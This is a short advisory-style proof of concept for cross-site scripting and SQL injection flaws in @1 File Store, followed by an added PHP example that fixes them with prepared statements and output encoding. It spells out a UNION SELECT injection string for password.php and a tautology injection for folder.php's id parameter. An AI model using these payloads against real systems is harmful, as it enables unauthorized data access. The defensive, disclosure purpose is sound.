PoC/Exploit for Multiple XSS and SQL Injection in @1 File Store

Published Proof of Concept code - Multiple XSS and SQL Injection in @1 File Store.

Description: Available
Solution: Not available - check vendor's website

1. Cross-Site Scripting Example:

URL: http://[host]/filestore/signup.php
Real Name: [XSS]
E-mail: [XSS]
Login: [XSS]


2. SQL Injection Examples:

URL: http://[host]/filestore/password.php
E-mail: 99999' union select 1,2,3,4,5,6,7,8,9,10,'hello','world','[send_to_email]',14,15,16/*

Registered user:
http://[host]/filestore/folder.php?id=999'%20or%201/*
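
Server-side handling that closes the three inputs listed above, as an added example that is not code from @1 File Store or from this advisory. The table and column names (`users`, `folders`, `email`, `name`), the function names and the SQLite demo data are assumptions, since the page does not show the application's source.

```php
<?php
declare(strict_types=1);
// Added example: table, column and function names are assumptions; the
// advisory does not show @1 File Store's source.

/** password.php: look up the account with a bound parameter. */
function find_user_by_email(PDO $db, string $email): ?array
{
    // Format check is only a first filter: valid addresses may contain a quote.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // Bound value: quotes and UNION text are compared as data, not parsed as SQL.
    $stmt = $db->prepare('SELECT id, email FROM users WHERE email = :email LIMIT 1');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** folder.php: accept only a short decimal id, then bind it as an integer. */
function find_folder(PDO $db, string $rawId): ?array
{
    if (preg_match('/\A[0-9]{1,9}\z/', $rawId) !== 1) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM folders WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** signup.php: encode Real Name, E-mail and Login wherever they are echoed. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)');
$db->exec('CREATE TABLE folders (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (email) VALUES ('alice@example.com')");
$db->exec("INSERT INTO folders (name) VALUES ('docs')");

var_dump(find_user_by_email($db, 'alice@example.com'));
var_dump(find_user_by_email($db, "99999' union select 1,2/*"));
var_dump(find_folder($db, '1'));
var_dump(find_folder($db, "999' or 1/*"));
echo h('<script>x</script>'), PHP_EOL;
```

When the backend is MySQL, set `PDO::ATTR_EMULATE_PREPARES` to `false` so the driver uses native prepared statements rather than client-side substitution.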
